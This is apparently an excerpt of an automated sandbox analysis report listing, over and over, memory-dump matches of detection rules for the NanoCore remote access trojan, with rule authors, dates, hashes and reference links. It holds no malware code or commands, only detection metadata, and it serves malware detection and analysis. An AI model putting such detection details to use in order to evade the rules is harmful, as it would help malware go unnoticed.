      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
